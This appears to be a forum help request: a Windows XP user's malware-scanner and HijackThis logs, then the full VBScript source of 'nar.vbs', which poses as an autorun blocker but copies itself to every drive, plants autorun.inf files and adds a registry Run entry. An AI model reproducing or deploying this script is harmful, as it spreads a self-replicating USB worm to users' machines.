2004-09-15 15:00 57856 977db6827ad7c3eaa1f9e83a22483611 C:\WINDOWS\$NtUninstallKB896423$\spoolsv.exe
2008-04-14 19:12 57856 6f9ff25dd729a9cae870e4beea764547 C:\WINDOWS\ServicePackFiles\i386\spoolsv.exe
2008-04-14 19:12 57856 6f9ff25dd729a9cae870e4beea764547 C:\WINDOWS\system32\spoolsv.exe
2004-09-15 15:00 24576 6484e1ecd8be4011d74fe68a761798fd C:\WINDOWS\$NtServicePackUninstall$\userinit.exe
2008-04-14 19:12 26112 3a5773b946c1b4f0db1b48a5d8e1d562 C:\WINDOWS\ServicePackFiles\i386\userinit.exe
2008-04-14 19:12 26112 3a5773b946c1b4f0db1b48a5d8e1d562 C:\WINDOWS\system32\userinit.exe
.
(((((((((((((((((((((((((((((( Registry startup points )))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries and legitimate default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [2008-04-14 19:12 15360]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IntelliPoint"="C:\Program Files\Microsoft IntelliPoint\point32.exe" [2003-05-16 02:41 163840]
"type32"="C:\Program Files\Microsoft IntelliType Pro\type32.exe" [2003-05-16 02:45 114688]
"SmcService"="C:\PROGRA~1\Sygate\smc.exe" [2004-10-15 19:40 2577632]
"nar"="C:\WINDOWS\nar.vbs" [2008-05-19 22:18 7474]
"BluetoothAuthenticationAgent"="bthprops.cpl" [2008-04-14 19:12 110592 C:\WINDOWS\system32\bthprops.cpl]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="C:\WINDOWS\system32\CTFMON.EXE" [2008-04-14 19:12 15360]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"NoDesktopCleanupWizard"= 1 (0x1)
"MaxRecentDocs"= 15 (0xf)

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"msacm.avis"= ff_acm.acm

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Käynnistä-valikko^Ohjelmat^Käynnistys^Adobe Reader Speed Launch.lnk]
backup=C:\WINDOWS\pss\Adobe Reader Speed Launch.lnkCommon Startup

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Käynnistä-valikko^Ohjelmat^Käynnistys^BTTray.lnk]
backup=C:\WINDOWS\pss\BTTray.lnkCommon Startup

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Käynnistä-valikko^Ohjelmat^Käynnistys^hp psc 1000 series.lnk]
backup=C:\WINDOWS\pss\hp psc 1000 series.lnkCommon Startup

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Käynnistä-valikko^Ohjelmat^Käynnistys^hpoddt01.exe.lnk]
backup=C:\WINDOWS\pss\hpoddt01.exe.lnkCommon Startup

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Käynnistä-valikko^Ohjelmat^Käynnistys^Microsoft Office.lnk]
backup=C:\WINDOWS\pss\Microsoft Office.lnkCommon Startup

[HKLM\~\startupfolder\C:^Documents and Settings^Omistaja^Käynnistä-valikko^Ohjelmat^Käynnistys^Adobe Gamma.lnk]
backup=C:\WINDOWS\pss\Adobe Gamma.lnkStartup

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ATICCC]
--a------ 2006-01-02 18:41 45056 C:\Program Files\ATI Technologies\ATI.ACE\CLI.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ctfmon.exe]
--a------ 2008-04-14 19:12 15360 C:\WINDOWS\system32\ctfmon.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DAEMON Tools-1033]
--a------ 2004-08-22 17:05 81920 D:\Ohjelmat\Daemon Tools\daemon.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NeroFilterCheck]
--a------ 2001-07-09 11:50 155648 C:\WINDOWS\system32\NeroCheck.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SunJavaUpdateSched]
--a------ 2005-11-10 14:03 36975 D:\Ohjelmat\java\bin\jusched.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BluetoothAuthenticationAgent]
--a------ 2008-04-14 19:12 110592 C:\WINDOWS\system32\bthprops.cpl

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SoundMan]
--a------ 2005-04-15 11:01 77824 C:\WINDOWS\SOUNDMAN.EXE

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run-]
"ctfmon.exe"=C:\WINDOWS\system32\ctfmon.exe
"SMSystemAnalyzer"="D:\Ohjelmat\System Mechanic Professional 6\SMSystemAnalyzer.exe"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-]
"BluetoothAuthenticationAgent"=rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
"RemoteControl"="C:\Program Files\CyberLink DVD Solution\PowerDVD\PDVDServ.exe"
"NeroFilterCheck"=C:\WINDOWS\system32\NeroCheck.exe
"LGODDFU"="C:\Program Files\lg_fwupdate\fwupdate.exe"
"ioloDelayModule"=D:\Ohjelmat\System Mechanic Professional 6\delay.exe

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\utorrent\\utorrent.exe"=
"C:\\Program Files\\Mozilla Firefox\\firefox.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"D:\\Ohjelmat\\revconnect1\\RevConnect\\DCPlusPlus.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=

R1 aswSP;avast! Self Protection;C:\WINDOWS\system32\drivers\aswSP.sys [2008-05-16 02:20]
R1 atitray;atitray;C:\Program Files\Radeon Omega Drivers\v3.8.231\ATI Tray Tools\atitray.sys [2006-01-24 21:32]
R2 aswFsBlk;aswFsBlk;C:\WINDOWS\system32\DRIVERS\aswFsBlk.sys [2008-05-16 02:16]
R2 NwSapAgent;SAP-agentti;C:\WINDOWS\system32\svchost.exe [2008-04-14 19:12]
R3 CnxTgN;Conexant AccessRunner PCI ADSL LAN Adapter Driver;C:\WINDOWS\system32\DRIVERS\CnxTgN.sys [2003-05-12 14:02]
R3 CnxTgP;Conexant AccessRunner PCI ADSL LAN Adapter Filter Driver;C:\WINDOWS\system32\DRIVERS\CnxTgP.sys [2003-05-12 13:56]
R3 CnxTgR;Conexant AccessRunner PCI ADSL Interface Device Driver;C:\WINDOWS\system32\DRIVERS\CnxTgR.sys [2003-05-12 13:54]
R3 FET5X86V;VIA Rhine-Family Fast-Ethernet Adapter Driver Service;C:\WINDOWS\system32\DRIVERS\fetnd5bv.sys [2006-12-20 08:00]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{6b33b354-c27d-11db-beb0-000ea131a418}]
\Shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe nar.vbs

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{6d4f6339-4027-11dc-bf86-00e0955017d8}]
\Shell\AutoRun\command - F:\InstallTomTomHOME.exe

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{a1984d2d-1616-11dd-80ac-00e0955017d8}]
\Shell\AutoRun\command - F:\InstallTomTomHOME.exe
.
Contents of the 'Scheduled Tasks' folder
2008-08-16 C:\WINDOWS\Tasks\FRU Task #Hewlett-Packard#hp psc 1100 series#1123313046.job
- C:\Program Files\Hewlett-Packard\Digital Imaging\Bin\hpqfrucl.exe [2003-04-06 00:52]
.
.
------- Supplementary Scan -------
.
FireFox -: Profile - C:\Documents and Settings\Omistaja\Application Data\Mozilla\Firefox\Profiles\wjofrm9v.default\
FireFox -: prefs.js - STARTUP.HOMEPAGE - hxxp://www.google.fi/
FF -: plugin - C:\Program Files\Mozilla Firefox\plugins\npmozax.dll
FF -: plugin - D:\Ohjelmat\java\bin\NPJava11.dll
FF -: plugin - D:\Ohjelmat\java\bin\NPJava12.dll
FF -: plugin - D:\Ohjelmat\java\bin\NPJava13.dll
FF -: plugin - D:\Ohjelmat\java\bin\NPJava14.dll
FF -: plugin - D:\Ohjelmat\java\bin\NPJava32.dll
FF -: plugin - D:\Ohjelmat\java\bin\NPJPI150_06.dll
FF -: plugin - D:\Ohjelmat\java\bin\NPOJI610.dll
FF -: plugin - D:\Ohjelmat\Real Alternative\browser\plugins\nppl3260.dll
FF -: plugin - D:\Ohjelmat\Real Alternative\browser\plugins\nprpjplug.dll
FF -: plugin - D:\Ohjelmat\VLC\npvlc.dll
.
.
------- File Associations (Beta) -------
.
JSEFile=NOTEPAD.EXE %1
VBEFile=NOTEPAD.EXE %1
VBSFile=NOTEPAD.EXE %1
.
**************************************************************************
catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-08-28 13:45:26
Windows 5.1.2600 Service Pack 3 NTFS

scanning hidden processes ...
scanning hidden autostart entries ...
scanning hidden files ...
scan completed successfully
hidden files: 0
**************************************************************************
[HKEY_LOCAL_MACHINE\system\ControlSet001\Services\vsdatant]
"ImagePath"=""
.
Completion time: 2008-08-28 13:49:17
ComboFix-quarantined-files.txt 2008-08-28 10:49:11

Pre-Run: 221,605,888 bytes free
Post-Run: 249,815,040 bytes free

296 --- E O F --- 2008-08-28 10:17:29
Malwarebytes' Anti-Malware 1.18
Tietokantaversio: 883

14:22:47 28.8.2008
mbam-log-8-28-2008 (14-22-47).txt

Tarkistustyyppi: Täysi tarkistus (C:\|D:\|)
Tarkistetut kohteet: 96965
Kulunut aika: 31 minute(s), 46 second(s)

Saastuneita muistiprosesseja: 0
Saastuneita muistimoduuleja: 0
Saastuneita rekisteriavaimia: 0
Saastuneita rekisteriarvoja: 0
Saastuneita rekisterikohteita: 0
Saastuneita hakemistoja: 0
Saastuneita tiedostoja: 0

Saastuneita muistiprosesseja:
(Haitallisia kohteita ei löydetty)

Saastuneita muistimoduuleja:
(Haitallisia kohteita ei löydetty)

Saastuneita rekisteriavaimia:
(Haitallisia kohteita ei löydetty)

Saastuneita rekisteriarvoja:
(Haitallisia kohteita ei löydetty)

Saastuneita rekisterikohteita:
(Haitallisia kohteita ei löydetty)

Saastuneita hakemistoja:
(Haitallisia kohteita ei löydetty)

Saastuneita tiedostoja:
(Haitallisia kohteita ei löydetty)
SDFix: Version 1.219
Run by Omistaja on to 28.08.2008 at 14:29

Microsoft Windows XP [versio 5.1.2600]
Running From: C:\Documents and Settings\Omistaja\Työpöytä\SDFix

Checking Services :

Restoring Default Security Values
Restoring Default Hosts File

Rebooting

Checking Files :

No Trojan Files Found

Folder C:\Documents and Settings\Omistaja\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#w*w.redtube.com - Removed

Removing Temp Files

ADS Check :

Final Check :

catchme 0.3.1361.2 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-08-28 14:37:01
Windows 5.1.2600 Service Pack 3 NTFS

scanning hidden processes ...

scanning hidden services & system hive ...

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BTHPORT\Parameters\Keys\000ea131a418]
"00124719159a"=hex:2f,a4,f0,96,83,fc,c2,10,6b,07,02,69,96,31,6b,2c
"0012eec0955e"=hex:83,04,5e,b3,cd,1f,32,49,f9,67,9f,f2,84,3e,9f,07
"001e3b3d6a77"=hex:ff,d0,59,ec,94,af,70,20,2b,8c,ae,6c,30,5a,62,9d
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\d347prt\Cfg\0Jf40]
"khjeh"=hex:20,02,00,00,81,e1,69,63,a7,ce,40,53,51,a2,f3,1f,71,17,a8,03,e9,..
"hj34z0"=hex:d9,e3,62,e3,fe,ff,e5,6b,64,5a,bf,77,7d,f5,13,6d,23,2f,2f,57,62,..
"hj34z1"=hex:57,e3,62,e3,86,ff,e5,6b,65,5a,be,77,7c,f5,13,6d,23,2f,2f,57,62,..
"hj34z2"=hex:57,e3,62,e3,86,ff,e5,6b,65,5a,be,77,7c,f5,13,6d,23,2f,2f,57,62,..
"hj34z3"=hex:57,e3,62,e3,86,ff,e5,6b,65,5a,be,77,7c,f5,13,6d,23,2f,2f,57,62,..
"hj34z4"=hex:57,e3,62,e3,86,ff,e5,6b,65,5a,be,77,7c,f5,13,6d,23,2f,2f,57,62,..
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\d347prt\Cfg\0Jf41]
"khjeh"=hex:20,02,00,00,b1,e1,69,63,14,09,53,39,e1,1d,c8,87,17,20,b0,bc,39,..
"hj34z0"=hex:53,f7,f1,87,5e,41,de,f3,54,7c,a7,c8,ad,d9,fe,af,93,1b,b2,7f,8f,..
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\d347prt\Cfg\0Jf42]
"khjeh"=hex:20,02,00,00,fc,73,78,c6,69,f3,94,5c,2c,a4,54,e8,06,11,03,78,3b,..
"hj34z0"=hex:3e,0f,57,60,93,f8,42,9c,5b,4d,14,0c,a8,e5,28,c3,70,50,6c,12,93,..
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\d347prt\Cfg\0Jf43]
"khjeh"=hex:20,02,00,00,fc,73,78,c6,50,26,75,b7,2c,a4,54,e8,06,11,03,78,3b,..
"hj34z0"=hex:3e,0f,57,60,93,f8,42,9c,5b,4d,14,0c,a8,e5,28,c3,70,50,6c,12,3e,..
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\BTHPORT\Parameters\Keys\000ea131a418]
"00124719159a"=hex:2f,a4,f0,96,83,fc,c2,10,6b,07,02,69,96,31,6b,2c
"0012eec0955e"=hex:83,04,5e,b3,cd,1f,32,49,f9,67,9f,f2,84,3e,9f,07
"001e3b3d6a77"=hex:ff,d0,59,ec,94,af,70,20,2b,8c,ae,6c,30,5a,62,9d

scanning hidden registry entries ...

scanning hidden files ...

scan completed successfully
hidden processes: 0
hidden services: 0
hidden files: 0

Remaining Services :

Authorized Application Key Export:

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabledxpsp2res.dll,-22019"
"C:\\Program Files\\utorrent\\utorrent.exe"="C:\\Program Files\\utorrent\\utorrent.exe:*:Enabled:µTorrent"
"C:\\Program Files\\Mozilla Firefox\\firefox.exe"="C:\\Program Files\\Mozilla Firefox\\firefox.exe:*:Enabled:Firefox"
"%windir%\\Network Diagnostic\\xpnetdiag.exe"="%windir%\\Network Diagnostic\\xpnetdiag.exe:*:Enabledxpsp3res.dll,-20000"
"D:\\Ohjelmat\\revconnect1\\RevConnect\\DCPlusPlus.exe"="D:\\Ohjelmat\\revconnect1\\RevConnect\\DCPlusPlus.exe:*:EnabledC++"
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"="C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"="C:\\Program Files\\Windows Live\\Messenger\\livecall.exe:*:Enabled:Windows Live Messenger (Phone)"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabledxpsp2res.dll,-22019"
"%windir%\\Network Diagnostic\\xpnetdiag.exe"="%windir%\\Network Diagnostic\\xpnetdiag.exe:*:Enabledxpsp3res.dll,-20000"
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"="C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"="C:\\Program Files\\Windows Live\\Messenger\\livecall.exe:*:Enabled:Windows Live Messenger (Phone)"

Remaining Files :

Files with Hidden Attributes :

Thu 8 May 2008 0 A..H. --- "C:\WINDOWS\SoftwareDistribution\Download\e2cdfda265544b05233b12ad6d933aba\BIT1.tmp"

Finished!
Logfile of HijackThis v1.99.1
Scan saved at 14:47:40, on 28.8.2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16705)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Sygate\smc.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\Program Files\Avast4\aswUpdSv.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
D:\BlueTooth\bin\btwdins.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Canon\CAL\CALMAIN.exe
C:\Program Files\Microsoft IntelliPoint\point32.exe
C:\Program Files\Microsoft IntelliType Pro\type32.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\HiJackThis\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Linkit
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - D:\Ohjelmat\java\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Liven kirjautumisapuohjelma - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [IntelliPoint] "C:\Program Files\Microsoft IntelliPoint\point32.exe"
O4 - HKLM\..\Run: [type32] "C:\Program Files\Microsoft IntelliType Pro\type32.exe"
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\smc.exe -startgui
O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
O4 - HKLM\..\Run: [nar] C:\WINDOWS\nar.vbs
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Lähetä &Bluetooth-laitteeseen - D:\BlueTooth\btsendto_ie_ctx.htm
O8 - Extra context menu item: Open Link Target in Firefox - file://C:\Documents and Settings\Omistaja\Application Data\Mozilla\Firefox\Profiles\wjofrm9v.default\extensions\{5D558C43-550F-4b12-84AB-0D8ABDA9F975}\firefoxviewlink.html
O8 - Extra context menu item: View This Page in Firefox - file://C:\Documents and Settings\Omistaja\Application Data\Mozilla\Firefox\Profiles\wjofrm9v.default\extensions\{5D558C43-550F-4b12-84AB-0D8ABDA9F975}\firefoxviewpage.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - D:\Ohjelmat\java\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - D:\Ohjelmat\java\bin\ssv.dll
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - D:\BlueTooth\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-4017 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - D:\BlueTooth\btsendto_ie.htm
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O11 - Options group: [INTERNATIONAL] International*
O16 - DPF: {00B71CFB-6864-4346-A978-C0A14556272C} (Checkers Class) - http://messenger.zone.msn.com/binary/msgrchkr.cab31267.cab
O16 - DPF: {14B87622-7E19-4EA8-93B3-97215F77A6BC} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab31267.cab
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {2917297F-F02B-4B9D-81DF-494B6333150B} (Minesweeper Flags Class) - http://messenger.zone.msn.com/binary/MineSweeper.cab31267.cab
O16 - DPF: {3B36B017-7E49-426B-95B0-B5CECD83C2E2} (IfolorUploader Control) - http://fika-web.ifolor.net/OrderingGeneral/LowRes/app_support/ActiveX/IfolorUploader_fika.cab
O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsClient.cab31267.cab
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/msnmessengersetupdownloader.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (ZoneIntro Class) - http://messenger.zone.msn.com/binary/ZIntro.cab32846.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O16 - DPF: {F6BF0D00-0B2A-4A75-BF7B-F385591623AF} (Solitaire Showdown Class) - http://messenger.zone.msn.com/binary/SolitaireShowdown.cab31267.cab
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O18 - Protocol: widimg - {EE7C2AFF-5742-44FF-BD0E-E521B0D3C3BA} - C:\WINDOWS\system32\btxppanel.dll
O20 - Winlogon Notify: dimsntfy - %SystemRoot%\System32\dimsntfy.dll (file missing)
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Avast4\aswUpdSv.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Avast4\ashMaiSv.exe" /service (file missing)
O23 - Service: avast! Web Scanner - Unknown owner - C:\Program Files\Avast4\ashWebSv.exe" /service (file missing)
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation - D:\BlueTooth\bin\btwdins.exe
O23 - Service: Canon Camera Access Library 8 (CCALib8) - Canon Inc. - C:\Program Files\Canon\CAL\CALMAIN.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: Sygate Personal Firewall (SmcService) - Sygate Technologies, Inc. - C:\Program Files\Sygate\smc.exe
One more thing I'd like to ask: what is Nar.vbs? At every startup it throws something like this on the screen:

'--------------------------------------------------------------->
'---Disables Autorun to prevent the spread of malicious code.--->
'---v0.1-------------------------------------------------------->
'--------------------------------------------------------------->
on error resume next
dim narsource,nar_RunDir,windir,disk_Drive,fso,mf,autorun,to_File,text,shell,in_WinDir,wsh_Path
set fso = CreateObject("Scripting.FileSystemObject")
set shell = CreateObject("Wscript.shell")
set mf = fso.GetFile(Wscript.ScriptFullname)
nar_RunDir = fso.GetParentFolderName(mf)
Set windir = fso.getspecialfolder(0)
in_WinDir = 2
wsh_Path = fso.GetFile(Wscript.Fullname)
'---Open the drive just like autorun would if it is not running from the windows directory--->
If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
    shell.run(windir & "\explorer.exe /root," & nar_RunDir)
    in_WinDir = 0
Else
    in_WinDir = 1
End If
'---If file is in windir and not running from windir then write the registry run value and exit--->
If (fso.FileExists(windir & "\nar.vbs") = 0 or in_WinDir = 1) Then
    autorun = "[autorun]"&vbcrlf&"shellexecute=wscript.exe nar.vbs"
    set text=mf.openastextstream(1,-2)
    do while not text.atendofstream
        narsource=narsource & text.readline
        narsource=narsource & vbcrlf
    loop
    If (in_WinDir = 0) Then
        set to_File = fso.getfile(windir & "\Nar.vbs")
        to_File.attributes = 32
        set to_File=fso.createtextfile(windir & "\Nar.vbs",2,true)
        to_File.write narsource
        to_File.close
        set to_File = fso.getfile(windir & "\Nar.vbs")
        to_File.attributes = 39
    End If
    do while (in_WinDir = 1)
        '---Add nar and autorun to each local disk drive excluding floppies--->
        for each disk_Drive in fso.drives
            If (disk_Drive.drivetype = 1 or disk_Drive.drivetype = 2) Then
                set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
                to_File.attributes = 32
                set to_File=fso.CreateTextFile(disk_Drive.path & "\nar.vbs",2,true)
                to_File.write narsource
                to_File.close
                set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
                to_File.attributes = 39
                set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
                to_File.attributes = 32
                set to_File=fso.CreateTextFile(disk_Drive.path & "\Autorun.inf",2,true)
                to_File.write autorun
                to_File.close
                set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
                to_File.attributes = 39
            End If
        next
        '---Edit the registry to disable autorun--->
        shell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\nar",windir&"\nar.vbs","REG_SZ"
        shell.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\AutoRun",0,"REG_DWORD"
        shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutoRun",255,"REG_DWORD"
        shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
        shell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
        shell.regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
        '---Run once every 5 minutes while within the Windows directory--->
        wscript.sleep(60000)
    loop
    '---Run the instance in the windows directory so a thumb drive is not stuck in use and the process continues--->
    If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
        temp = windir&"\nar.vbs"
        shell.run temp,1,0
    End If
End If
shell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\nar",windir&"\nar.vbs","REG_SZ"
Done. By the way, is there any information on what that Nar.vbs is? I mean, where it came from, why it opened that window at every startup, what it does, and what benefit or harm it causes?